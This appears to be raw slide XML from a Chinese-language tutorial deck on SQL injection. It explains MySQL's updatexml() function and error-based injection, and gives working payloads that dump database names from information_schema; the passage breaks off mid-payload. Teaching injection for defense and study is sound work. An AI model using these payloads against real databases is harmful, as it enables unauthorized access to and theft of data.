          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>xml_document,xpath_string,new_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FC1EF98-87FA-4B7C-84E4-1DFA8195C934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632718" y="3496644"/>
            <a:ext cx="10054993" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>正常语法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xml_document,xpath_string,new_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>第一个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xml_document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>格式，为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文档对象的名称</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>第二个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xpath_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>格式的字符串</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>第三个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>new_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>格式，替换查找到的负荷条件的数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>作用：改变文档中符合条件的节点的值</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010F511B-DD51-4F00-BBF0-8BFDBADF3C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713996" y="5632214"/>
            <a:ext cx="10857316" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第二个参数跟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数的第二个参数一样，因此也可以利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9DD309F-5943-4C72-8436-CF34565EBE27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="5947787"/>
            <a:ext cx="6497291" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>能查询字符串的最大长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2176521188"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAC0692-DAC5-41B7-9C4D-E8D83DFD7F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774635" y="1215274"/>
            <a:ext cx="5008844" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>报错注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8422181-1A76-49EC-95FF-66ED3E48E1A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001347" y="1198102"/>
            <a:ext cx="7496847" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select * from user where username='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0D2E5E-462B-4623-9127-076EBD6409B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390021" y="2997179"/>
            <a:ext cx="3046547" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>爆数据库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDEEAB75-3008-4ED2-B892-F993936935C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408659" y="3392281"/>
            <a:ext cx="12011201" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> ' and(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(1,concat('~',(select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>                                                              from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>)),1))#</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86522897-3C7E-4370-9C01-DDBD4987D7F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391775" y="4467013"/>
            <a:ext cx="12889008" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t> ' and(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>(1,concat('~',(select</a:t>
            </a:r>
            <a:r>
